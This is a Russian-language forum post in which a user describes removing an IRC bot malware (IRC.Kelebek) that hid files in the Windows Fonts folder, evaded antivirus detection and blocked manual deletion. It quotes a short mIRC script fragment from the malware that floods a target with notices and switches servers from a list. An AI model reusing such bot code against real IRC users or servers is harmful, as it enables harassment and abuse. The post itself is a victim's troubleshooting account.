Victorkoly
Advanced Member | Редактировать | Профиль | Сообщение | Цитировать | Сообщить модератору
Цитата:
Ну и я парочку выкладывал. Главная проблема - это когда нет детекта на файлы от него.
Так же есть случай, что он ставит себя в специфическую папку Fonts, в которой не отображаются в проводнике левые файлы (а это могут быть exe/dll/sys).
Если сильно постараться (я так смог), то в версии IRC.Kelebek может выйти запущенной активная dll, которая вместе с файлом sys (всего 3 файла - 2 библиотеки, и 1 драйвер). Детекта у моего антивируса не было на эти файлы, а удаление ручками заблокировано. Пришлось убивать CureIt! с перезагрузкой (сразу загрузился в безопасном и снес остальные 2 файла).
Вот код библиотеки (какой-то условный):
on 1:join:*: {
if ($server == %hucumserver) {
if ($chan == %hucumkanal) {
if ($server !== irc.hayta.net) {
timer 1 10 raw part %hucumkanal
timer 8 0 notice %hucumhedef %hucummesaj
.timer 1 20 .saldirisifirla
.timer 1 20 .server $read(server.txt)
halt
}
}
}
}
Причем на 2 других файла наоборот был детект таких движков, как Avira, ESET-NOD32. Ещё был один exe-файл, его удалить я смог (хотя и не было детекта) - он имел детекты Avira, DrWeb, ESET-NOD32 и Kaspersky.
----------
AVG2017, версия IDSagent 17.4.3.1767. ОС: Win7 x64. |
|
. 
